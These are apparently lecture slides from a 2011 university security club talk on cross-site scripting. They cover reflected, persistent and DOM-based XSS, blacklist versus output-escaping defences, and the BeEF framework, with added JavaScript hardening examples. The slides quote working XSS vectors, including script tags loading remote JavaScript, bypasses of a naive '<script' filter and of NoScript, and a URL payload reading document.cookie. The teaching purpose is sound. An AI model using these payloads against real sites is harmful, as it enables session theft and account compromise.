
Introduction to XSS attacks

Lecturer: MOUGEY Camille

SecurIMAG

2011-10-06

WARNING: SecurIMAG is a security club at Ensimag. Thoughts, ideas and opinions are not related to Ensimag. The authors assume no liability including for errors and omissions.

¡¡_ (in)security we trust _!!

Grenoble INP Ensimag


Summary

• Reflected & Persistent XSS
  • Principle
  • Counter-measure
  • Tools Related
• DOM based XSS/DOMXSS
  • Principle
  • Counter-measure
• DOMBased vs. Standard XSS

SecurIMAG - Introduction to XSS attacks - MOUGEY Camille - 2011-10-06


Intro

• Cross Site Scripting (XSS)
  • Malicious script injection
• XSS != CSRF
• Often underestimated
• Easy to find, hard to defeat
  • XSS on bank websites, Facebook, Google, …
• Constant evolution
  • Need standard functions (PHP 5: filter_var())


Reflected & Persistent XSS


Reflected & Persistent XSS Explanation

•  Reflected


(figure: "Reflected XSS / type 1 attack", slide 49/77 of "Web based vulnerabilities - XSS - Cross-Site scripting", Fabien Duchene, Karim Hossen (LIG), 5MMSSI-1 Common vulnerabilities and attacks, 2011-2012, citing [IBM 2002] Cross-site scripting)


Reflected & Persistent XSS Explanation

• Persistent

(figure: Reflected vs. Persistent)

• Demo


Reflected & Persistent XSS Counter-Measure

• Seems safe, but easy to defeat
• In real life:

    if (preg_match("#<script#is", urldecode($input))) die("FAIL");

-> Safe?

Vectors quoted from the XSS Cheat Sheet (ha.ckers.org):

    <IMG SRC="jav ascript:alert('XSS');">
    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

    <IMG SRC="jav&#x09;ascript:alert('XSS');">
    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

    <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

    <SCRIPT SRC=//ha.ckers.org/.j>
    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]

Try '< script' (with a space)


Reflected & Persistent XSS Counter-Measure

• Testing for XSS (black box):
  • Identify input
  • Analyse HTML code
• Testing for Stored XSS
  • Replay browser frames/requests (from logs, …) with an instrumented browser


Reflected & Persistent XSS Counter-Measure

• Client Side
  • SOP
  • NoScript
• Bypass method

NoScript's default anti-XSS rule:

    ^http://([a-z]+)\.google\.(?:[a-z]{1,3}\.)?[a-z]+/(?:search|custom|\1)\?

Try www.google.xss.com …

• v1.6.9.2
• v1.6.9.8: Hold CTRL, and NoScript disappeared ..


Reflected & Persistent XSS Counter-Measure

• Server side
  • OWASP 8 Rules
  • RULE #1 - HTML Escape Before Inserting Untrusted Data into HTML Element Content
• In general, never trust client input!
• Have you thought about 'User-Agent', 'Referer', 'Accept-Language', 'Cookies', … ?
• HTTPOnly cookie flag

RULE #1:
    &  -->  &amp;
    <  -->  &lt;
    >  -->  &gt;
    "  -->  &quot;
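As an added example (not from the slides): a JavaScript port of the slide-7 blacklist `preg_match("#<script#is", urldecode($input))` next to an escaper implementing Rule #1, run over the vectors quoted on slide 7 to show where the blacklist misses and why output escaping does not. The sample inputs are constructed; the two extra escapes (' and /) come from the OWASP cheat sheet, not from the slide.

```javascript
// Added example (not from the SecurIMAG slides): slide-7 blacklist vs. OWASP Rule #1.

// Port of the PHP check preg_match("#<script#is", urldecode($input)):
// true when the (URL-decoded) input would be rejected with "FAIL".
function blacklistRejects(input) {
  let decoded = input;
  try { decoded = decodeURIComponent(input); } catch (e) { /* keep raw on bad %-escapes */ }
  return /<script/i.test(decoded);
}

// OWASP XSS Prevention Rule #1: escape the characters that carry meaning in HTML
// element content. The slide lists & < > "; the OWASP sheet also escapes ' and /.
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;",
  '"': "&quot;", "'": "&#x27;", "/": "&#x2F;",
};
function htmlEscape(untrusted) {
  return String(untrusted).replace(/[&<>"'\/]/g, (c) => HTML_ESCAPES[c]);
}

// After escaping no '<', '>' or '"' survives, so the browser cannot open a new
// tag or attribute: the value is rendered as text, whatever it contained.
function isInertInElementContent(escaped) {
  return !/[<>"]/.test(escaped);
}

// Constructed inputs: a benign name plus the vectors quoted on slide 7.
const SAMPLES = [
  "Fabien",
  "<script>alert(1)</script>",
  "%3Cscript%3Ealert(1)%3C/script%3E",            // URL-encoded: urldecode() still catches it
  '<IMG SRC="jav&#x09;ascript:alert(\'XSS\');">', // contains no "<script" substring at all
  "<SCRIPT SRC=//ha.ckers.org/.j>",               // caught only thanks to the /i flag
];

// For each sample: did the blacklist reject it, and is its escaped form inert?
function compare(samples = SAMPLES) {
  return samples.map((s) => ({
    input: s,
    blacklistRejects: blacklistRejects(s),
    escaped: htmlEscape(s),
    inert: isInertInElementContent(htmlEscape(s)),
  }));
}
```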


Reflected & Persistent XSS Tools related

• Counter-Measure
  • Input/Output sanitization: HTMLPurifier
• Stored XSS Finder
  • Scrubbr
  • Some homemade script
• Ajax worms
• XSS Exploitation Framework
  • BeEF


BeEF

•  Architecture


BeEF

•  Launch

•  Hook

•  And you get:


BeEF


• BeEF notable features
  • Browser exploitation modules
  • Keystroke logging
  • Browser proxying
  • Integration with Metasploit via XML-RPC
  • Plugin detection
  • Intranet service exploitation
  • Tor detection
  • Browser functionality detection modules

•  Demo !


DOM based XSS/DOMXSS


DOM Based XSS/DOMXSS/type-0 XSS

•  DOM (Document Object Model)?

    <P ALIGN="right">This is a <B>paragraph</B></P>

(figure: DOM tree of this fragment - a P node with attribute Align = "right", whose content is the text "This is a" followed by a B node containing "paragraph")


DOM Based XSS/DOMXSS/type-0 XSS

• DOM Based XSS principle
  • Main idea: the web server does not receive the payload anymore!
  • Detection is usually focused on the server output


DOMBased Example

• Classic example:

    <HTML>
    <TITLE>Welcome!</TITLE>
    Hi
    <SCRIPT>
    var pos=document.URL.indexOf("name=")+5;
    document.write(document.URL.substring(pos,document.URL.length));
    </SCRIPT>
    <BR>
    Welcome to our system
    …
    </HTML>

• Normal use: http://www.vulnerable.site/welcome.html?name=Fabien
• What about: http://www.vulnerable.site/welcome.html?name=<script>alert(document.cookie)</script>
• Does the server see the payload? Use #
  • http://www.vulnerable.site/welcome.html?foobar=name=<script>alert(document.cookie)<script>&name=Fabien


DOMBased Counter-Measure

• Traditional methods
  • HTML encoding output data at the server side
  • Removing/encoding offending input data at the server side
  • Don't work well on DOMBased!
• 3 main rules
  • Avoid client-side document-sensitive actions using client-side data. Prefer dynamic pages!
  • Analyzing and hardening the client-side (Javascript) code
  • Use a very strict IPS policy (avoid evasion techniques like double attribute)


DOMBased Counter-Measure Back to the Example


    <SCRIPT>
    var pos=document.URL.indexOf("name=")+5;
    var name=document.URL.substring(pos,document.URL.length);
    // whitelist: the whole value must be alphanumeric
    if (name.match(/^[a-zA-Z0-9]+$/))
    {
        document.write(name);
    }
    else
    {
        window.alert("Security error");
    }
    </SCRIPT>
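The fix above still locates the parameter by hand (`indexOf("name=")`), so the `foobar=name=` URL from the previous slide makes it read the decoy instead of the real `name` value. As an added example (not the slides' code), the same whitelist check on top of a real query-string parser, with the `#`-fragment case the server never sees, written as DOM-free functions so it runs under Node; the URLs are constructed after the slide's examples.

```javascript
// Added example (not from the SecurIMAG slides): hardened parameter handling
// for welcome.html, kept as pure functions so it can be tested outside a browser.

const NAME_RE = /^[a-zA-Z0-9]+$/;   // the slide's whitelist: whole value alphanumeric

// The slide's original lookup: first "name=" anywhere in the URL, up to the end.
// Kept only to show what it returns on a decoy parameter.
function naiveName(url) {
  const pos = url.indexOf("name=") + 5;
  return url.substring(pos, url.length);
}

// Hardened lookup: parse the URL, read the real "name" parameter from the query
// string (or from the fragment, which never reaches the server), then accept it
// only if it matches the whitelist. Returns null for the "Security error" case.
function safeName(url) {
  const u = new URL(url);
  let value = u.searchParams.get("name");
  if (value === null && u.hash.length > 1) {
    value = new URLSearchParams(u.hash.slice(1)).get("name");
  }
  if (value === null || !NAME_RE.test(value)) return null;
  return value;
}

// Render with textContent rather than document.write/innerHTML: even if the
// whitelist were loosened later, the value could not become markup.
function renderGreeting(container, url) {
  const name = safeName(url);
  container.textContent = name === null ? "Security error" : "Hi " + name;
  return container.textContent;
}

// Constructed URLs following the slide-18 examples (benign <b> tag as the marker).
const NORMAL   = "http://www.vulnerable.site/welcome.html?name=Fabien";
const DECOY    = "http://www.vulnerable.site/welcome.html?foobar=name=<b>x</b>&name=Fabien";
const FRAGMENT = "http://www.vulnerable.site/welcome.html#name=<b>x</b>";

if (typeof document !== "undefined") {
  renderGreeting(document.body, document.URL);   // browser use
}
```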



DOMBased vs. Standard XSS

Root cause
  • Standard XSS: insecure embedding of client input in the HTML outbound page
  • DOM Based XSS: insecure reference and use (in client-side code) of DOM objects that are not fully controlled by the server-provided page

Page nature
  • Standard XSS: dynamic ONLY
  • DOM Based XSS: typically static (HTML)

Vulnerability detection
  • Standard XSS: manual fault injection; automatic fault injection; code review (needs access to the page source)
  • DOM Based XSS: manual fault injection; code review (can be done remotely!)

Attack detection
  • Standard XSS: web server logs; online attack detection tools (IDS, IPS, web application firewalls)
  • DOM Based XSS: if evasion techniques are applicable and used, no server-side detection is possible

Counter-measure
  • Standard XSS: data validation at the server side; attack prevention utilities/tools (IPS, application firewalls)
  • DOM Based XSS: data validation at the client side (in Javascript); alternative server-side logic


Questions ?


Source / Bibliography

• Wikipedia:
  • XSS
  • DOM
• UC Berkeley:
  • An Empirical Analysis of XSS Sanitization in Web Application Frameworks
• MISC n°49
• XSS Cheat Sheet:
  • http://ha.ckers.org/xss.html
• DOMXSS Wiki:
  • https://code.google.com/p/domxsswiki/wiki/Index
• DOM Based Cross Site Scripting or XSS of the Third Kind:
  • http://www.webappsec.org/projects/articles/071105.shtml
• OWASP:
  • https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
  • Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001)
  • Testing_for_Stored_Cross_site_scripting_(OWASP-DV-002)
  • Testing_for_DOM-based_Cross_site_scripting_(OWASP-DV-003)
  • Scrubbr
  • https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
• BeEF:
  • http://beefproject.com/
• Ajax Worms:
  • http://www.gnucitizen.org/blog/wormx/
  • http://en.wikipedia.org/wiki/Samy_(XSS)
• Mario Heiderich (HIP2k11):
  • http://heideri.ch